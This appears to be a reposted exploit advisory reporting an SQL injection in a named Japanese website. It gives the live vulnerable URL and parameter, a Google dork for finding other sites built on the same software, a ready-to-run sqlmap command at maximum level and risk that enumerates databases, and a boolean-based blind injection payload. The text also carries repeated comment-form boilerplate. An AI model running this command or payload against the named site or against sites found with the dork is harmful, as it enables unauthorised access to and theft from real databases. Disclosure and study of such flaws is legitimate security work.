ENG - SQL Injection vulnerability

ENG - SQL Injection vulnerability
2020-10-24 00:11:44 Author: cxsecurity.com(查看原文) 阅读量:239 收藏

**************************** #Exploit Title: ENG - SQL Injection vulnerability #Date: 2020-10-23 #Exploit Author: Mahdi Karimi #Vendor Homepage: https://eng.nihongodecarenavi.jp #Google Dork: "Powered by Eng" #Tested On: windows 10 sqlmap: sqlmap -u "https://eng.nihongodecarenavi.jp/category/category-list.php?id=86" --level=5 --risk=3 --dbs --random-agent Testing Method; - boolean-based blind Parameter: id (GET) Type: boolean-based blind Title: HAVING boolean-based blind - WHERE, GROUP BY clause Payload: id=86 HAVING 2301=2301 ************************************************** #Discovered by: Mahdi Karimi #Email : [email protected] **************************************************

Thanks for you comment!
Your message is in quarantine 48 hours.

文章来源: https://cxsecurity.com/issue/WLB-2020100152
如有侵权请联系:admin#unsafe.sh

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.